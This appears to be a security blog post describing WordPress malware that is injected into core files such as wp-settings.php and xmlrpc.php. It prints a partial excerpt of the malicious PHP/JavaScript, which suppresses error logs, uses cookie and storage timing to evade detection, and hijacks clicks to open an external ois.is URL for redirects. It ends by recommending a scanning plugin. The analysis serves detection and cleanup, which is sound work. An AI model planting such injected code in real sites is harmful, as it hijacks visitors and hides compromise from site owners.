We will introduce an example of a type of malware in which an image file of ois.is is illegally embedded, which has been increasing greatly in recent years.


Malware that loads malware disguised as images from ois.is and executes it on WordPress sites

This malware exploits a vulnerability and embeds malicious code in key WordPress files by taking away WordPress administrator privileges.

Since the malware infects WordPress by embedding code in the form of additions to the main WordPress files, only the tampered parts must be carefully removed, since deleting the file itself will cause the site to malfunction.

↓The most commonly tampered with files are as follows
wp-settings.php
wp-comments-post.php
xmlrpc.php
wp-trackback.php
wp-blog-header.php
wp-signup.php
wp-cron.php
wp-links-opml.php

Malware Code

Let’s take a look at the malware code. The tampered part of this malware is shown below.

error_reporting(0);
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('display_errors', 0);

$ckUjYggTf = 0;
   foreach($_COOKIE as $vUjUnHvOOoO => $vvvUjUnHvOOoO){
      1(omitted)
      break;
   }
}
}
function globalClick(event) {
const host = location.host
const newLocation = \"https://ois.is/images/logo.png\"
2(omitted)
const hoursDiff = getHoursDiff(nowDate, storageDate)
console.log(nowDate, storageDate, hoursDiff)
if (hoursDiff >= allowedHours) {
addToStorage(host, nowDate);
window.open(newLocation, \"_blank\");
}
3(omitted)
window.open(newLocation, \"_blank\"); }
}
}
document.addEventListener(\"clickClick", globalClick); }
})();"; }
}

The ini_set portion of the code does not output any errors or warnings.

In the part 1, the time is recorded in the user’s COOKIE to ensure that malware is only executed on rare occasions, thus delaying the detection of malware infection.

In part 2, the malicious code of the malware itself, disguised as an image, is retrieved from an external server called ois.is. This includes a list of malicious URLs, called a redirect hack, that force users to visit a different site when they visit it.

In part 3, the code is executed and also hijacks the clicks on the site so that the redirect hack is manifested when the user clicks on any link.

This malware can be detected and removed with the following plugin. Please try it.
Free] WordPress:Malware Scan & Security Plugin [Malware and Virus Detection and Removal].